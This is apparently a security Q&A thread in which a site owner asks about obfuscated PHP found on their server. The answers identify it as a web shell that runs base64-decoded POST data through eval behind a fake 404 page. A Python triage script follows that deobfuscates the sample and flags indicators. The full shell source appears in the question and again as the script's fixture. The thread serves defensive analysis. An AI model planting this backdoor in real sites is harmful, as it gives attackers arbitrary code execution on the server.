I found the following code on my website. What does it do? Is it malicious?

<?php
    @ignore_user_abort(true);
    @set_time_limit(0);
    $getherw3423 = "FFS"."W35"."25KK"."Sfj";
    $rretert454352 = "b"."".""."a"."s".""."".""."e"."".""."6"."".""."4"."_".""."".""."d"."e"."c"."o".""."".""."".""."d".""."e";
    $qwretrqt5234 = "";
    if(!empty($_POST[$getherw3423]) and strlen($_POST[$getherw3423]) > 0 and isset($_POST[$getherw3423])){
        $qwretrqt5234 = $rretert454352($_POST[$getherw3423]);
        @eval($qwretrqt5234);
    } else {
        echo "<html><head>
        <title>404 Page Not Found</title>
        </head><body>
        <h1>Not Found</h1>
        <p>The requested URL was not found.</p>
        </body></html>";
    }
?>
alecxe
Chris
  • Judging by the fact that it's looking at $_POST, it's doing something with input from the user. The fact that it's obfuscated suggests that it's malicious. – S.L. Barth May 08 '15 at 14:38
    Welcome to Information Security! While asking how to [analyse malicious scripts is on topic](http://meta.security.stackexchange.com/a/1768/2344), questions which ask for the work to be done for them are out of scope. There are lots of [related questions](http://security.stackexchange.com/q/88752/2344), also see the "Related" column to the left, that describe how to analyse PHP scripts. – amccormack May 08 '15 at 14:48

3 Answers

Modified PHP shell. Compromise is bad; shell's worse. Best have backups, nuke, change passwords, reload.

Quick legwork:

The string "FFSW3525KKSfj" trivially obtains this result, which is clearly inspired by the same codebase (containing all split base64 reference). Easy pivot from there is "ERROR! CANT DO NOTHING!".

That discovers it's related to this one, with md5 62c8486b3d05c537e5f81efec750937b, there identified as PHP.Shell.95.

This site reports the script in association with sending millions of spam messages, Joomla is related to it associated with installing a component called mod_administrator but the advice relies heavily on random output so I'm not linking. Seems related to this github repo (Vanilla Ice, conditioners). The time frame is about right.

ǝɲǝɲbρɯͽ
  • Thank you very much for the detailed answer and the supporting links. I'll take the actions and advice from all of those responding. Much appreciated. – Chris May 08 '15 at 16:14
This code is parsing base64 encoded post data and running it as a script.

My advice to you would be to pull the affected site down immediately, as any data that is stored in the file system or any connected databases is now at risk. Remove database users and prepare to clean up!

There are many run-throughs of what you should do in the event that your web site is exploited. I would suggest that you search for and follow the advice offered.

Aaron Dobbing

It's a simple script that will take an argument passed to it from another script or possibly even the URL, and then run it as arbitrary php code.

So it is only as malicious as the random stranger who installed it for you is, or whoever finds it. Who knows! Maybe you will find the convenience of having your webserver running arbitrary code helpful.

J Kimball
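As an added illustration of what the answers above describe (this is not code from the question or from any of the answers): a small Python script that folds the split string literals back together, inlines the resulting constants into the variable-function call and the `$_POST` subscript, and then reports the indicators a defender would look for when triaging a file like this. The regex-based folding and constant propagation are a simplification that only handles the double-quoted `"a"."b"` concatenation style used in this sample; the sample itself is the script from the question, embedded here so the example runs offline.

```python
import re

# Constructed fixture: the obfuscated script quoted in the question, embedded so
# the example runs offline. It is never executed, only parsed as text.
SAMPLE = r'''<?php
    @ignore_user_abort(true);
    @set_time_limit(0);
    $getherw3423 = "FFS"."W35"."25KK"."Sfj";
    $rretert454352 = "b"."".""."a"."s".""."".""."e"."".""."6"."".""."4"."_".""."".""."d"."e"."c"."o".""."".""."".""."d".""."e";
    $qwretrqt5234 = "";
    if(!empty($_POST[$getherw3423]) and strlen($_POST[$getherw3423]) > 0 and isset($_POST[$getherw3423])){
        $qwretrqt5234 = $rretert454352($_POST[$getherw3423]);
        @eval($qwretrqt5234);
    } else {
        echo "<html><head><title>404 Page Not Found</title></head><body></body></html>";
    }
?>
'''

# A PHP double-quoted string literal (handles backslash escapes inside it).
STR = r'"(?:[^"\\]|\\.)*"'
# Two or more literals joined with PHP's "." concatenation operator.
CONCAT = re.compile(rf'{STR}(?:\s*\.\s*{STR})+')
LITERAL = re.compile(STR)
# Simple constant assignment: $name = "literal";
ASSIGN = re.compile(rf'\$(\w+)\s*=\s*({STR})\s*;')

# Regexes for the traits a reviewer would flag in a dropped PHP file.
INDICATORS = {
    "eval": r'\beval\s*\(',
    "base64_decode": r'\bbase64_decode\s*\(',
    "request_input": r'\$_(?:POST|GET|REQUEST|COOKIE)\b',
    "error_suppression": r'@\s*\w+\s*\(',
    "keep_running": r'ignore_user_abort\s*\(\s*true\s*\)',
    "no_time_limit": r'set_time_limit\s*\(\s*0\s*\)',
    "variable_function_call": r'\$\w+\s*\(',
}


def fold_concats(src: str) -> str:
    """Collapse chains like "b"."".""."a" into the single literal they build."""
    def join(match: re.Match) -> str:
        parts = [lit[1:-1] for lit in LITERAL.findall(match.group(0))]
        return '"' + "".join(parts) + '"'
    return CONCAT.sub(join, src)


def resolve_variables(src: str) -> str:
    """Inline string constants where they are used as a function name or array key.

    This is a deliberately naive one-pass propagation (assumption: each constant
    is assigned exactly once), enough to expose $var($_POST[$key]) patterns.
    """
    consts = {name: lit[1:-1] for name, lit in ASSIGN.findall(src)}
    for name, value in consts.items():
        if not value:
            continue
        # $name(...)  ->  value(...)
        src = re.sub(rf'\${re.escape(name)}\s*\(', lambda m, v=value: v + "(", src)
        # [$name]     ->  ["value"]
        src = re.sub(rf'\[\s*\${re.escape(name)}\s*\]', lambda m, v=value: f'["{v}"]', src)
    return src


def analyze(src: str) -> dict:
    """Deobfuscate and score a PHP source string; returns a triage report."""
    folded = fold_concats(src)
    resolved = resolve_variables(folded)
    found = sorted(
        name for name, pat in INDICATORS.items()
        if re.search(pat, folded) or re.search(pat, resolved)
    )
    if {"eval", "request_input"} <= set(found):
        verdict = "webshell-like"   # untrusted input reaches eval()
    elif found:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "deobfuscated": resolved,
        "indicators": found,
        "string_split_chains": len(CONCAT.findall(src)),
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print("verdict:", report["verdict"])
    print("indicators:", ", ".join(report["indicators"]))
    print("split-string chains folded:", report["string_split_chains"])
    print(report["deobfuscated"])
```

Running it prints the script with `$rretert454352($_POST[$getherw3423])` rewritten to `base64_decode($_POST["FFSW3525KKSfj"])`, which is exactly the parameter name the first answer pivots on, and a verdict of `webshell-like` because request input flows into `eval()`. The same `analyze()` can be run over every `.php` file under a web root to shortlist files for manual review; treat the indicator list as a triage aid, not a proof of innocence for files it does not flag.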